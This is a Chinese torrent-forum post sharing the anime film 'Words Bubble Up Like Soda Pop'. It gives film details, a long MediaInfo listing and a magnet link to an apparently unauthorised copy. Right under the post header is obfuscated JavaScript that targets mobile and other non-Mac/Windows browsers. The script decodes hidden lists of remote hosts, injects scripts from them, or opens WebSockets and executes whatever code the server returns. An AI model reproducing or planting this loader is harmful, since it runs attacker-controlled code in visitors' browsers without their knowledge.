言语如苏打般涌现[简繁字幕]Words.Bubble.Up.Like.Soda.Pop.2021.1080p.NF.WEB-DL.DDP5.1.x264-迅雷下载 4.91GB

版主小s 2月前 419

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 言语如苏打般涌现 / 言语如汽水般喷涌而出 / Words Bubble Up Like Soda Pop

◎片 名 サイダーのように言葉が湧き上がる

◎年 代 2020

◎产 地 日本

◎类 别 动画

◎语 言 日语

◎上映日期 2020-07-25(上海电影节) / 2021-06-25(日本)

◎IMDb链接 https://www.imdb.com/title/tt12735338/

◎豆瓣评分 7.7/10 (391人评价)

◎豆瓣链接 https://movie.douban.com/subject/30453095/

◎片 长 87分钟

◎导 演 石黑恭平 Kyohei Ishiguro (id:1363078)

◎编 剧 佐藤大 Dai Sato (id:1314165)

◎演 员 藤间斋 (id:1435813)

杉咲花 Hana Sugisaki (id:1318811)

潘惠美 Megumi Han (id:1324022)

花江夏树 Natsuki Hanae (id:1323704)

梅原裕一郎 Yuichiro Umehara (id:1347605)

中岛爱 Megumi Nakajima (id:1275751)

诸星堇 Sumire Morohoshi (id:1319649)

神谷浩史 Hiroshi Kamiya (id:1274377)

坂本真绫 Maaya Sakamoto (id:1146783)

山寺宏一 K?ichi Yamadera (id:1019299)

牛尾宪辅 Ushio Kensuke (id:1407858)

◎标 签 日本 / 日本动画 / 动画 / 日本动画电影 / 2020 / 动画电影 / 动漫 / 剧场版

◎简 介

Cherry是个不善与人交谈、一直戴着耳机的少年,他喜欢把无法说出口的心情寄托于俳句中。Smile是个为了把矫正中的大门牙挡起来而一直戴着口罩的少女,身为人气视频上传者的她,看到可爱的东西就会发布视频。这样的两个人在商场相遇了,交换了联系方式开始聊天。他们在一起打工的地方,遇见了一个叫藤山的老人,后来还得知了老人一直在寻找某张唱片的原因。他们决定一起寻找唱片,而两人之间的距离也越来越近。但当某件事情发生之后,两人的想法出现了分歧。

◎获奖情况 (共1项)

第23届上海国际电影节 (2020)

金爵奖 最佳动画片(提名)

└──石黑恭平 (id:1363078)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 50741436755991177918169642191132134828 (0x262C71FBB4697EFA3BA7463F31918DAC)

  4. Complete name : Words[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 4.91 GiB

  8. Duration : 1 h 27 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 8 046 kb/s

  11. Encoded date : UTC 2021-07-23 05:18:42

  12. Writing application : mkvmerge v44.0.0 ('Domino') 64-bit

  13. Writing library : libebml v1.3.10 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 3 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 3 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 27 min

  24. Bit rate mode : Variable

  25. Bit rate : 2 279 kb/s

  26. Nominal bit rate : 3 320 kb/s

  27. Maximum bit rate : 4 980 kb/s

  28. Width : 1 920 pixels

  29. Height : 1 080 pixels

  30. Display aspect ratio : 16:9

  31. Frame rate mode : Constant

  32. Frame rate : 23.976 (24000/1001/53354) FPS

  33. Color space : YUV

  34. Chroma subsampling : 4:2:0

  35. Bit depth : 8 bits

  36. Scan type : Progressive

  37. Bits/(Pixel*Frame) : 0.046

  38. Stream size : 1.39 GiB (28%)

  39. Writing library : x264 core 148 r2722 1b0121b

  40. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=23 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=3320 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=4980 / vbv_bufsize=6640 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  41. Default : Yes

  42. Forced : No


  43. Audio #1

  44. ID : 2

  45. Format : E-AC-3

  46. Format/Info : Enhanced AC-3

  47. Commercial name : Dolby Digital Plus

  48. Codec ID : A_EAC3

  49. Duration : 1 h 27 min

  50. Bit rate mode : Constant

  51. Bit rate : 640 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 31.250 FPS (1536 SPF)

  56. Compression mode : Lossy

  57. Stream size : 400 MiB (8%)

  58. Title : Japanese

  59. Language : Japanese

  60. Service kind : Complete Main

  61. Default : Yes

  62. Forced : No


  63. Audio #2

  64. ID : 3

  65. Format : E-AC-3

  66. Format/Info : Enhanced AC-3

  67. Commercial name : Dolby Digital Plus

  68. Codec ID : A_EAC3

  69. Duration : 1 h 27 min

  70. Bit rate mode : Constant

  71. Bit rate : 640 kb/s

  72. Channel(s) : 6 channels

  73. Channel layout : L R C LFE Ls Rs

  74. Sampling rate : 48.0 kHz

  75. Frame rate : 31.250 FPS (1536 SPF)

  76. Compression mode : Lossy

  77. Stream size : 400 MiB (8%)

  78. Title : English

  79. Language : English

  80. Service kind : Complete Main

  81. Default : No

  82. Forced : No


  83. Audio #3

  84. ID : 4

  85. Format : E-AC-3

  86. Format/Info : Enhanced AC-3

  87. Commercial name : Dolby Digital Plus

  88. Codec ID : A_EAC3

  89. Duration : 1 h 27 min

  90. Bit rate mode : Constant

  91. Bit rate : 640 kb/s

  92. Channel(s) : 6 channels

  93. Channel layout : L R C LFE Ls Rs

  94. Sampling rate : 48.0 kHz

  95. Frame rate : 31.250 FPS (1536 SPF)

  96. Compression mode : Lossy

  97. Stream size : 400 MiB (8%)

  98. Title : French

  99. Language : French

  100. Service kind : Complete Main

  101. Default : No

  102. Forced : No


  103. Audio #4

  104. ID : 5

  105. Format : E-AC-3

  106. Format/Info : Enhanced AC-3

  107. Commercial name : Dolby Digital Plus

  108. Codec ID : A_EAC3

  109. Duration : 1 h 27 min

  110. Bit rate mode : Constant

  111. Bit rate : 640 kb/s

  112. Channel(s) : 6 channels

  113. Channel layout : L R C LFE Ls Rs

  114. Sampling rate : 48.0 kHz

  115. Frame rate : 31.250 FPS (1536 SPF)

  116. Compression mode : Lossy

  117. Stream size : 400 MiB (8%)

  118. Title : German

  119. Language : German

  120. Service kind : Complete Main

  121. Default : No

  122. Forced : No


  123. Audio #5

  124. ID : 6

  125. Format : E-AC-3

  126. Format/Info : Enhanced AC-3

  127. Commercial name : Dolby Digital Plus

  128. Codec ID : A_EAC3

  129. Duration : 1 h 27 min

  130. Bit rate mode : Constant

  131. Bit rate : 640 kb/s

  132. Channel(s) : 6 channels

  133. Channel layout : L R C LFE Ls Rs

  134. Sampling rate : 48.0 kHz

  135. Frame rate : 31.250 FPS (1536 SPF)

  136. Compression mode : Lossy

  137. Stream size : 400 MiB (8%)

  138. Title : Italian

  139. Language : Italian

  140. Service kind : Complete Main

  141. Default : No

  142. Forced : No


  143. Audio #6

  144. ID : 7

  145. Format : E-AC-3

  146. Format/Info : Enhanced AC-3

  147. Commercial name : Dolby Digital Plus

  148. Codec ID : A_EAC3

  149. Duration : 1 h 27 min

  150. Bit rate mode : Constant

  151. Bit rate : 640 kb/s

  152. Channel(s) : 6 channels

  153. Channel layout : L R C LFE Ls Rs

  154. Sampling rate : 48.0 kHz

  155. Frame rate : 31.250 FPS (1536 SPF)

  156. Compression mode : Lossy

  157. Stream size : 400 MiB (8%)

  158. Title : Brazilian Portuguese

  159. Language : Portuguese

  160. Service kind : Complete Main

  161. Default : No

  162. Forced : No


  163. Audio #7

  164. ID : 8

  165. Format : E-AC-3

  166. Format/Info : Enhanced AC-3

  167. Commercial name : Dolby Digital Plus

  168. Codec ID : A_EAC3

  169. Duration : 1 h 27 min

  170. Bit rate mode : Constant

  171. Bit rate : 640 kb/s

  172. Channel(s) : 6 channels

  173. Channel layout : L R C LFE Ls Rs

  174. Sampling rate : 48.0 kHz

  175. Frame rate : 31.250 FPS (1536 SPF)

  176. Compression mode : Lossy

  177. Stream size : 400 MiB (8%)

  178. Title : Spanish

  179. Language : Spanish

  180. Service kind : Complete Main

  181. Default : No

  182. Forced : No


  183. Audio #8

  184. ID : 9

  185. Format : E-AC-3

  186. Format/Info : Enhanced AC-3

  187. Commercial name : Dolby Digital Plus

  188. Codec ID : A_EAC3

  189. Duration : 1 h 27 min

  190. Bit rate mode : Constant

  191. Bit rate : 640 kb/s

  192. Channel(s) : 6 channels

  193. Channel layout : L R C LFE Ls Rs

  194. Sampling rate : 48.0 kHz

  195. Frame rate : 31.250 FPS (1536 SPF)

  196. Compression mode : Lossy

  197. Stream size : 400 MiB (8%)

  198. Title : European Spanish

  199. Language : Spanish

  200. Service kind : Complete Main

  201. Default : No

  202. Forced : No


  203. Audio #9

  204. ID : 10

  205. Format : E-AC-3

  206. Format/Info : Enhanced AC-3

  207. Commercial name : Dolby Digital Plus

  208. Codec ID : A_EAC3

  209. Duration : 1 h 27 min

  210. Bit rate mode : Constant

  211. Bit rate : 640 kb/s

  212. Channel(s) : 6 channels

  213. Channel layout : L R C LFE Ls Rs

  214. Sampling rate : 48.0 kHz

  215. Frame rate : 31.250 FPS (1536 SPF)

  216. Compression mode : Lossy

  217. Stream size : 400 MiB (8%)

  218. Title : Thai

  219. Language : Thai

  220. Service kind : Complete Main

  221. Default : No

  222. Forced : No


  223. Text #1

  224. ID : 11

  225. Format : UTF-8

  226. Codec ID : S_TEXT/UTF8

  227. Codec ID/Info : UTF-8 Plain Text

  228. Duration : 1 h 26 min

  229. Bit rate : 36 b/s

  230. Count of elements : 935

  231. Stream size : 22.9 KiB (0%)

  232. Title : English

  233. Language : English

  234. Default : Yes

  235. Forced : No


  236. Text #2

  237. ID : 12

  238. Format : UTF-8

  239. Codec ID : S_TEXT/UTF8

  240. Codec ID/Info : UTF-8 Plain Text

  241. Duration : 1 h 22 min

  242. Bit rate : 65 b/s

  243. Count of elements : 923

  244. Stream size : 39.9 KiB (0%)

  245. Title : Arabic

  246. Language : Arabic

  247. Default : No

  248. Forced : No


  249. Text #3

  250. ID : 13

  251. Format : UTF-8

  252. Codec ID : S_TEXT/UTF8

  253. Codec ID/Info : UTF-8 Plain Text

  254. Duration : 1 h 26 min

  255. Bit rate : 39 b/s

  256. Count of elements : 943

  257. Stream size : 25.1 KiB (0%)

  258. Title : Chinese Simplified

  259. Language : Chinese

  260. Default : No

  261. Forced : No


  262. Text #4

  263. ID : 14

  264. Format : UTF-8

  265. Codec ID : S_TEXT/UTF8

  266. Codec ID/Info : UTF-8 Plain Text

  267. Duration : 1 h 26 min

  268. Bit rate : 33 b/s

  269. Count of elements : 901

  270. Stream size : 21.2 KiB (0%)

  271. Title : Chinese Traditional

  272. Language : Chinese

  273. Default : No

  274. Forced : No


  275. Text #5

  276. ID : 15

  277. Format : UTF-8

  278. Codec ID : S_TEXT/UTF8

  279. Codec ID/Info : UTF-8 Plain Text

  280. Duration : 1 h 26 min

  281. Bit rate : 33 b/s

  282. Count of elements : 900

  283. Stream size : 21.2 KiB (0%)

  284. Title : Croatian

  285. Language : Croatian

  286. Default : No

  287. Forced : No


  288. Text #6

  289. ID : 16

  290. Format : UTF-8

  291. Codec ID : S_TEXT/UTF8

  292. Codec ID/Info : UTF-8 Plain Text

  293. Duration : 1 h 26 min

  294. Bit rate : 36 b/s

  295. Count of elements : 943

  296. Stream size : 23.2 KiB (0%)

  297. Title : Czech

  298. Language : Czech

  299. Default : No

  300. Forced : No


  301. Text #7

  302. ID : 17

  303. Format : UTF-8

  304. Codec ID : S_TEXT/UTF8

  305. Codec ID/Info : UTF-8 Plain Text

  306. Duration : 1 h 26 min

  307. Bit rate : 34 b/s

  308. Count of elements : 893

  309. Stream size : 22.0 KiB (0%)

  310. Title : Danish

  311. Language : Danish

  312. Default : No

  313. Forced : No


  314. Text #8

  315. ID : 18

  316. Format : UTF-8

  317. Codec ID : S_TEXT/UTF8

  318. Codec ID/Info : UTF-8 Plain Text

  319. Duration : 1 h 26 min

  320. Bit rate : 35 b/s

  321. Count of elements : 899

  322. Stream size : 22.5 KiB (0%)

  323. Title : Dutch

  324. Language : Dutch

  325. Default : No

  326. Forced : No


  327. Text #9

  328. ID : 19

  329. Format : UTF-8

  330. Codec ID : S_TEXT/UTF8

  331. Codec ID/Info : UTF-8 Plain Text

  332. Duration : 1 h 26 min

  333. Bit rate : 32 b/s

  334. Count of elements : 912

  335. Stream size : 20.4 KiB (0%)

  336. Title : Finnish

  337. Language : Finnish

  338. Default : No

  339. Forced : No


  340. Text #10

  341. ID : 20

  342. Format : UTF-8

  343. Codec ID : S_TEXT/UTF8

  344. Codec ID/Info : UTF-8 Plain Text

  345. Duration : 1 h 26 min

  346. Bit rate : 38 b/s

  347. Count of elements : 958

  348. Stream size : 24.2 KiB (0%)

  349. Title : French

  350. Language : French

  351. Default : No

  352. Forced : No


  353. Text #11

  354. ID : 21

  355. Format : UTF-8

  356. Codec ID : S_TEXT/UTF8

  357. Codec ID/Info : UTF-8 Plain Text

  358. Duration : 1 h 26 min

  359. Bit rate : 36 b/s

  360. Count of elements : 920

  361. Stream size : 23.4 KiB (0%)

  362. Title : German

  363. Language : German

  364. Default : No

  365. Forced : No


  366. Text #12

  367. ID : 22

  368. Format : UTF-8

  369. Codec ID : S_TEXT/UTF8

  370. Codec ID/Info : UTF-8 Plain Text

  371. Duration : 1 h 26 min

  372. Bit rate : 61 b/s

  373. Count of elements : 919

  374. Stream size : 39.1 KiB (0%)

  375. Title : Greek

  376. Language : Greek

  377. Default : No

  378. Forced : No


  379. Text #13

  380. ID : 23

  381. Format : UTF-8

  382. Codec ID : S_TEXT/UTF8

  383. Codec ID/Info : UTF-8 Plain Text

  384. Duration : 1 h 26 min

  385. Bit rate : 59 b/s

  386. Count of elements : 912

  387. Stream size : 37.7 KiB (0%)

  388. Title : Hebrew

  389. Language : Hebrew

  390. Default : No

  391. Forced : No


  392. Text #14

  393. ID : 24

  394. Format : UTF-8

  395. Codec ID : S_TEXT/UTF8

  396. Codec ID/Info : UTF-8 Plain Text

  397. Duration : 1 h 26 min

  398. Bit rate : 38 b/s

  399. Count of elements : 933

  400. Stream size : 24.4 KiB (0%)

  401. Title : Hungarian

  402. Language : Hungarian

  403. Default : No

  404. Forced : No


  405. Text #15

  406. ID : 25

  407. Format : UTF-8

  408. Codec ID : S_TEXT/UTF8

  409. Codec ID/Info : UTF-8 Plain Text

  410. Duration : 1 h 26 min

  411. Bit rate : 35 b/s

  412. Count of elements : 921

  413. Stream size : 22.4 KiB (0%)

  414. Title : Indonesian

  415. Language : Indonesian

  416. Default : No

  417. Forced : No


  418. Text #16

  419. ID : 26

  420. Format : UTF-8

  421. Codec ID : S_TEXT/UTF8

  422. Codec ID/Info : UTF-8 Plain Text

  423. Duration : 1 h 26 min

  424. Bit rate : 36 b/s

  425. Count of elements : 897

  426. Stream size : 23.2 KiB (0%)

  427. Title : Italian

  428. Language : Italian

  429. Default : No

  430. Forced : No


  431. Text #17

  432. ID : 27

  433. Format : UTF-8

  434. Codec ID : S_TEXT/UTF8

  435. Codec ID/Info : UTF-8 Plain Text

  436. Duration : 1 h 26 min

  437. Bit rate : 64 b/s

  438. Count of elements : 1077

  439. Stream size : 40.8 KiB (0%)

  440. Title : Japanese

  441. Language : Japanese

  442. Default : No

  443. Forced : No


  444. Text #18

  445. ID : 28

  446. Format : UTF-8

  447. Codec ID : S_TEXT/UTF8

  448. Codec ID/Info : UTF-8 Plain Text

  449. Duration : 1 h 26 min

  450. Bit rate : 44 b/s

  451. Count of elements : 950

  452. Stream size : 28.1 KiB (0%)

  453. Title : Korean

  454. Language : Korean

  455. Default : No

  456. Forced : No


  457. Text #19

  458. ID : 29

  459. Format : UTF-8

  460. Codec ID : S_TEXT/UTF8

  461. Codec ID/Info : UTF-8 Plain Text

  462. Duration : 1 h 26 min

  463. Bit rate : 37 b/s

  464. Count of elements : 932

  465. Stream size : 24.0 KiB (0%)

  466. Title : Malay

  467. Language : Malay

  468. Default : No

  469. Forced : No


  470. Text #20

  471. ID : 30

  472. Format : UTF-8

  473. Codec ID : S_TEXT/UTF8

  474. Codec ID/Info : UTF-8 Plain Text

  475. Duration : 1 h 26 min

  476. Bit rate : 33 b/s

  477. Count of elements : 931

  478. Stream size : 21.2 KiB (0%)

  479. Title : Norwegian Bokmal

  480. Language : Norwegian Bokmal

  481. Default : No

  482. Forced : No


  483. Text #21

  484. ID : 31

  485. Format : UTF-8

  486. Codec ID : S_TEXT/UTF8

  487. Codec ID/Info : UTF-8 Plain Text

  488. Duration : 1 h 26 min

  489. Bit rate : 35 b/s

  490. Count of elements : 865

  491. Stream size : 22.5 KiB (0%)

  492. Title : Polish

  493. Language : Polish

  494. Default : No

  495. Forced : No


  496. Text #22

  497. ID : 32

  498. Format : UTF-8

  499. Codec ID : S_TEXT/UTF8

  500. Codec ID/Info : UTF-8 Plain Text

  501. Duration : 1 h 26 min

  502. Bit rate : 37 b/s

  503. Count of elements : 940

  504. Stream size : 23.4 KiB (0%)

  505. Title : Portuguese

  506. Language : Portuguese

  507. Default : No

  508. Forced : No


  509. Text #23

  510. ID : 33

  511. Format : UTF-8

  512. Codec ID : S_TEXT/UTF8

  513. Codec ID/Info : UTF-8 Plain Text

  514. Duration : 1 h 26 min

  515. Bit rate : 36 b/s

  516. Count of elements : 937

  517. Stream size : 23.2 KiB (0%)

  518. Title : Brazilian Portuguese

  519. Language : Portuguese

  520. Default : No

  521. Forced : No


  522. Text #24

  523. ID : 34

  524. Format : UTF-8

  525. Codec ID : S_TEXT/UTF8

  526. Codec ID/Info : UTF-8 Plain Text

  527. Duration : 1 h 26 min

  528. Bit rate : 40 b/s

  529. Count of elements : 849

  530. Stream size : 25.8 KiB (0%)

  531. Title : Romanian

  532. Language : Romanian

  533. Default : No

  534. Forced : No


  535. Text #25

  536. ID : 35

  537. Format : UTF-8

  538. Codec ID : S_TEXT/UTF8

  539. Codec ID/Info : UTF-8 Plain Text

  540. Duration : 1 h 26 min

  541. Bit rate : 60 b/s

  542. Count of elements : 910

  543. Stream size : 38.0 KiB (0%)

  544. Title : Russian

  545. Language : Russian

  546. Default : No

  547. Forced : No


  548. Text #26

  549. ID : 36

  550. Format : UTF-8

  551. Codec ID : S_TEXT/UTF8

  552. Codec ID/Info : UTF-8 Plain Text

  553. Duration : 1 h 26 min

  554. Bit rate : 35 b/s

  555. Count of elements : 888

  556. Stream size : 22.5 KiB (0%)

  557. Title : Spanish

  558. Language : Spanish

  559. Default : No

  560. Forced : No


  561. Text #27

  562. ID : 37

  563. Format : UTF-8

  564. Codec ID : S_TEXT/UTF8

  565. Codec ID/Info : UTF-8 Plain Text

  566. Duration : 1 h 26 min

  567. Bit rate : 38 b/s

  568. Count of elements : 957

  569. Stream size : 24.1 KiB (0%)

  570. Title : European Spanish

  571. Language : Spanish

  572. Default : No

  573. Forced : No


  574. Text #28

  575. ID : 38

  576. Format : UTF-8

  577. Codec ID : S_TEXT/UTF8

  578. Codec ID/Info : UTF-8 Plain Text

  579. Duration : 1 h 26 min

  580. Bit rate : 37 b/s

  581. Count of elements : 826

  582. Stream size : 23.7 KiB (0%)

  583. Title : Swedish

  584. Language : Swedish

  585. Default : No

  586. Forced : No


  587. Text #29

  588. ID : 39

  589. Format : UTF-8

  590. Codec ID : S_TEXT/UTF8

  591. Codec ID/Info : UTF-8 Plain Text

  592. Duration : 1 h 26 min

  593. Bit rate : 91 b/s

  594. Count of elements : 959

  595. Stream size : 57.8 KiB (0%)

  596. Title : Thai

  597. Language : Thai

  598. Default : No

  599. Forced : No


  600. Text #30

  601. ID : 40

  602. Format : UTF-8

  603. Codec ID : S_TEXT/UTF8

  604. Codec ID/Info : UTF-8 Plain Text

  605. Duration : 1 h 26 min

  606. Bit rate : 36 b/s

  607. Count of elements : 918

  608. Stream size : 22.8 KiB (0%)

  609. Title : Turkish

  610. Language : Turkish

  611. Default : No

  612. Forced : No


  613. Text #31

  614. ID : 41

  615. Format : UTF-8

  616. Codec ID : S_TEXT/UTF8

  617. Codec ID/Info : UTF-8 Plain Text

  618. Duration : 1 h 26 min

  619. Bit rate : 54 b/s

  620. Count of elements : 931

  621. Stream size : 34.1 KiB (0%)

  622. Title : Ukrainian

  623. Language : Ukrainian

  624. Default : No

  625. Forced : No


  626. Text #32

  627. ID : 42

  628. Format : UTF-8

  629. Codec ID : S_TEXT/UTF8

  630. Codec ID/Info : UTF-8 Plain Text

  631. Duration : 1 h 26 min

  632. Bit rate : 50 b/s

  633. Count of elements : 895

  634. Stream size : 32.0 KiB (0%)

  635. Title : Vietnamese

  636. Language : Vietnamese

  637. Default : No

  638. Forced : No



TAGS 动画

磁力链:
  • magnet:?xt=urn:btih:DF4BA81A69FC7BF65DF54538011351946B7A7700
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回